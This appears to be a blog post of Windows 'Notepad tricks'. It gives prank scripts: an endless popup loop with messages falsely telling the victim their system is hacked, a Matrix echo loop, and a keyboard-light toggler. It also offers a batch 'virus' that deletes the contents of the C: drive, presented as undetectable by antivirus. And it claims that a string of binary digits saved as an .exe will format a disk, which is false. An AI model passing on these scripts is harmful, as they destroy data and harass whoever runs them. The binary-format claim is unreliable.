Notepad's Tips and Tricks

0



1.  Make A Personal Log-Book or A Diary
·        Copy the below code and paste it into notepad and save it as “log.txt”.
·        .LOG
·        Now every time you open this log file, you will have all the log details with date and time.

2.  Constantly Repeat Any Messages

·        This is one of the Best Notepad tricks that will repeat any of messages on computer screen repeatedly. Just copy the below code and paste in the notepad and save it as “message.bat”.
@ECHO off
:Begin
msg * Hi Dude
msg * kya tu Bewkuf hai be?
msg * Main Tera Baap Hu!
msg *Mai Tere System ko Hack Karne Ja Rha Hu Rok Ke Dikha !
msg * Ab Tera System Mera Control me Hai
GOTO BEGIN

3.  Matrix Effect

·        This code will give you matrix effect on your screen just copy the below code and paste in notepad and save it as “anyname.bat”.
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

4.     Turn Your Keyboard Into an EDM Festival


·         Ever wish your keyboard was more 1) annoying and 2) festive? Well, thanks to this trick you can make that happen.

 Paste the following code into a Notepad doc:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
·        Save as a .vbs file.
Double-click on saved file.
Dance.
What is happening is the computer is rapidly toggling the CAPS lock, NUMBER lock, and SCROLL lock on and off (which usually lights an LED on most keyboards). This is very annoying if you want to actually use your keyboard for typing. If you want to turn it off, you have to 1) restart the computer or 2) in Windows 10, go to Task Manager and end "Microsoft Windows Based Script Host." (I haven't confirmed it, but reportedly if you're using Windows 8 or before, you'll want to end "wscript.exe" in Task Manager.)

5.     Write your own simple virus cant detected by any antivirus:

@Echo off
Del C:\ *.* |y
·         And save that as .bat RUN IT
·         It will delete the content of C:\ drive.
·         Please Note:: don’t run that .bat file on your system… it will delete c: drive.

6.   Format Your Hard Disk Using Just Notepad !

·         Ever wondered of a way to format your hard disk using just notepad ?
·         Open notepad.
·         Type the following the code in it (Or just copy paste it).
01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000
·         Save it as an .exe file giving any name you desire.
·         That’s It ! Now just double click on the file (to open it) and your C: drive will be formatted !
·         This is just a little binary fun. Be Careful while using it..


Post a Comment

0Comments
Post a Comment (0)